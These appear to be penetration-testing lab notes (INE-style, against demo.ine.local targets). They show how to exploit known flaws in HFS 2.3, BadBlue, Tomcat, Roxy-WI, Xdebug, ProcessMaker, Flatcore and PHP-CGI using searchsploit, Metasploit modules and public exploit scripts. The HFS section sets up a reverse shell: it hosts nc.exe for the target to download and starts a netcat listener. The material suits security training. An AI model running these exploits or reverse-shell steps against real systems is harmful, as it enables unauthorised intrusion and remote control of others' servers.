# Different Applications Vulnerabilities ### HTTP File Server (HFS) 2.3 #### scanning ``` ┌──(root㉿INE)-[~] └─# nmap -sV -p 80 demo.ine.local Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-01 21:14 IST Nmap scan report for demo.ine.local (10.5.16.210) Host is up (0.0030s latency). PORT STATE SERVICE VERSION 80/tcp open http HttpFileServer httpd 2.3 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 6.48 seconds ``` Let us find the if we have an exploit ``` searchsploit hfs ```

Rejetto HTTP File Server (HFS) 2.3 is vulnerable to RCE. Exploiting the target server using the Metasploit framework ``` msfconsole -q use exploit/windows/http/rejetto_hfs_exec set RHOSTS demo.ine.local exploit ```

#### Manual Exploitation Now that we have identified a vulnerable service running on the target system, we can search for publicly available exploit code that can be used to exploit **Rejetto HFS 2.3** with Searchsploit. This can be done by running the following command: ``` searchsploit HTTP File Server 2.3 ``` As shown in the following screenshot, Searchsploit reveals quite a few exploits, one of which is a Metasploit module, however, in our case, we will be using the Python exploit.

Now that we have identified the exploit we would like to use, we can copy the exploit file to our current working directory with Searchsploit by running the following command: ``` searchsploit -m 39161 ``` This exploit, while functional, does not work out of the box and needs to be modified per the environment you are working in and the configuration of the target. Now that we have copied the exploit to our current working directory, we can modify it with VIM by running the following command: ``` vim 39161.py ``` As shown in the following screenshot, this exploit requires you to **change the local IP and local port** values.

You can obtain your local Kali IP address by running the following command: ``` ifconfig ``` As shown in the preceding screenshot, we have changed the local port to **1234**, feel free to change this to any open port on your Kali system. After making the changes to the exploit code, you can save it and exit out of VIM. After modifying the exploit code, we can run it with Python to ensure that it works correctly. For this exploit to work, you will need to host the **nc.exe** on a web server as the exploit will download it to the target system. Kali Linux comes pre-packaged with various Windows binaries, one of which is the nc.exe executable found under **/usr/share/windows-resources/binaries/nc.exe**. We can copy the nc.exe executable to our Desktop by running the following command: ``` cp /usr/share/windows-resources/binaries/nc.exe /root/Desktop/ ``` After copying the nc.exe executable to the Desktop, we can host it by setting up an HTTP server on port 80 with Python. This can be done by running the following command: ``` python -m SimpleHTTPServer 80 ``` As shown in the following screenshot, this will host the nc.exe executable.

Next, we will need to open a new terminal window where we will set up the **Netcat listener** to receive the connection from the target once the exploit script is executed. We can set up the Netcat listener by running the following command: ``` nc -nvlp 1234 ``` **Note:** Ensure you change the Netcat port to listen if you specified a different port when modifying the exploit. After setting up the web server and the Netcat listener, you will need to open another terminal window to run the exploit script. Navigate to the directory you copied the exploit to with Searchsploit and run the following command: ``` python 39161.py demo.ine.local 80 ``` **Note:** You may need to run the exploit multiple times for success! As shown in the following screenshot, if the exploit script runs successfully, you should receive a reverse shell on your Netcat listener.

### Badblue #### Scanning ``` ┌──(root㉿attackdefense)-[~] └─# nmap -sV -p 80 demo.ine.local Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-10 18:41 IST Nmap scan report for demo.ine.local (10.5.16.112) Host is up (0.0018s latency). PORT STATE SERVICE VERSION 80/tcp open http BadBlue httpd 2.7 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 6.48 seconds ``` **BadBlue 2.7** is available. We will search the exploit module for badblue 2.7 using searchsploit. ``` searchsploit badblue 2.7 ```

There is a metasploit module for badblue server. We will use PassThru remote buffer overflow metasploit module to exploit the target. ``` msfconsole -q use exploit/windows/http/badblue_passthru set RHOSTS demo.ine.local exploit ```

### Apache Tomcat Apache Tomcat is a Java web server that primarily serves as a servlet container, which means it provides an environment for running Java-based web applications. Target is running a Tomcat Server 8.5.19. Search “apache tomcat 8.5.19 exploit”

Target is running a Tomcat Server 8.5.19. Search “apache tomcat 8.5.19 exploit” on google to find the vulnerability.

Open exploit-db.com link: \[]

The target might be vulnerable to **“JSP Upload Bypass RCE”**. Exploiting the target server using metasploit **tomcat\_jsp\_upload\_bypass** module. **Commands:** ``` msfconsole use exploit/multi/http/tomcat_jsp_upload_bypass set RHOSTS demo.ine.local check (We are running a “check” command in the metasploit framework to make sure that if the target is vulnerable to jsp_upload_bypass or not.) exploit ```

We have successfully exploited the target Tomcat server and received a shell. ### **Roxy-WI** ``` ┌──(root㉿INE)-[~] └─# nmap -sV -sC -p- target2.ine.local Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-14 20:51 IST Nmap scan report for target2.ine.local (192.211.16.4) Host is up (0.000027s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.52 ((Ubuntu)) |_http-title: Roxy-WI |_http-server-header: Apache/2.4.52 (Ubuntu) 443/tcp open ssl/http Apache httpd 2.4.52 | tls-alpn: |_ http/1.1 | ssl-cert: Subject: commonName=*.roxy-wi.org/organizationName=Roxy-WI/stateOrProvinceName=Almaty/countryName=US | Not valid before: 2022-07-29T05:20:44 |_Not valid after: 2050-12-14T05:20:44 |_http-title: Roxy-WI |_ssl-date: TLS randomness does not represent time |_http-server-header: Apache/2.4.52 (Ubuntu) MAC Address: 02:42:C0:D3:10:04 (Unknown) Service Info: Host: roxy-wi.example.com Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 16.82 seconds ``` As we can see in the Nmap result under the HTTP title, `Roxy-WI` is running on the web server. Let's check if there is an exploit available for it in Metasploit. We can search for it using the following command: ``` search Roxy-WI ```

Here, we have found an exploit. Let’s select this module by typing `use 0`, and then type `options` to see the required parameters we need to exploit this. We only need to set `LHOST` and `RHOSTS`. * `LHOST` is your local IP, which you can obtain by running `ifconfig`. * `RHOSTS` is our target system. After setting these, type `exploit` to run the exploit.

### Xdebug Extension **Step 1:** We will scan the target using dirb tool. ``` dirb http://demo.ine.local ```

**Step 2:** We will access phpinfo.php file using curl to find more information about the web server. ``` curl http://demo.ine.local/phpinfo.php ```

**Step 3:** The xdebug extension is enabled on target server. We can exploit it using exploit/unix/http/xdebug\_unauth\_exec metasploit module. ``` msfconsole -q use exploit/unix/http/xdebug_unauth_exec set RHOSTS demo.ine.local set LHOST exploit ```

### Process Maker Now that we have been able to identify what web application is running on the web server and the respective version of the web app, we can utilize a tool like Searchsploit to identify whether this specific version of **ProcessMaker** is vulnerable to any exploits. This can be done by running the following command: ``` searchsploit ProcessMaker ```

As shown in the preceding screenshot, a Metasploit Framework exploit module exists for the ProcessMaker web app, however, it does not specify what version it can be used to exploit. As a result, we will need to fire up the Metasploit Framework console and test the exploit. We can access the Metasploit Framework via the infamous Metasploit Console (msfconsole). This can be done by running the following command: ``` msfconsole ```

Once **msfconsole** has started, we can search for the **ProcessMaker** exploit module by running the following command: ``` search ProcessMaker ``` As shown in the following screenshot, the search reveals two exploit modules, in this case, we will be using the first exploit listed.

We can use this module by running the following command: ``` use exploit/multi/http/processmaker_exec ``` After loading the module, we will need to configure the module options following the target system we are exploiting. You can display the options pertinent to a module by running the following command: ``` show options ```

Firstly, we will need to set the target address, this can be done by running the following command: **Command:** ``` set RHOSTS demo.ine.local ``` Upon closer inspection of the module options, we can identify that this module requires legitimate credentials to work correctly. Fortunately, we were able to identify the default credentials for the admin user. In this case, the module already has the **USERNAME** and **PASSWORD** options set to admin. After configuring the **RHOSTS** option, we can execute the module by running the following command: ``` run ``` As shown in the following screenshot, if the exploit runs successfully, we should receive a **meterpreter** session providing us with remote access to the target system.

### Exploiting flatcore Since the website is running on Flatcore, we should check if there are any known exploits available for this CMS. We can do this using the following command: ``` searchsploit flatcore ``` This command searches the Exploit-DB database for publicly available exploits related to Flatcore. If an exploit is found, we can analyze its details and attempt to use it for further exploitation.

As you can see, there are two available exploits, but neither is present in Metasploit. This means we need to execute the exploit manually on our system. Since our goal is to gain access to the root system, we will use the first exploit, which is Remote Code Execution (Authenticated). To copy the exploit’s Python code into our current working directory, we can use the following command: ``` searchsploit -m 50262 ``` Before executing the exploit, we should first read and analyze the code to understand how it works.

After reviewing the code, we can determine how to execute the exploit. To run the Python script and attempt exploitation, we use the following command: ``` python3 50262.py http://target1.ine.local/ admin password1 ```

We have successfully logged in using the exploit. Now, to retrieve our first flag, we need to access the **root directory.** First, we list the directory contents using the following command: `ls /`

### PHP Exploitation We can identify the version of PHP running on the web server by accessing the **phpinfo.php** file in a browser as shown in the following screenshot.

The **phpinfo.php** file reveals that **PHP 5.2.4** is running on the web server. Now that we have identified the exact version of PHP running on the web server, we can utilize a tool like Searchsploit to find exploits affecting this version of PHP. This can be done by running the following command: ``` searchsploit php cgi ``` As shown in the following screenshot, the Searchsploit search reveals quite a few exploits, however, one stands out as a potentially useful exploit.

This exploit is available as a Metasploit framework exploit module. We will need to start the Metasploit Framework console (msfconsole) in order to use this exploit, this can be done by running the following command: ``` msfconsole ``` We can now load the module by running the following command: ``` use exploit/multi/http/php_cgi_arg_injection ``` After loading the module, we will need to configure the module options, more specifically, we will need to set the target. ``` set RHOSTS demo.ine.local ``` We can now execute the exploit module by running the following command: ``` run ``` As shown in the following screenshot, the exploit runs successfully and provides us with a meterpreter session on the target system.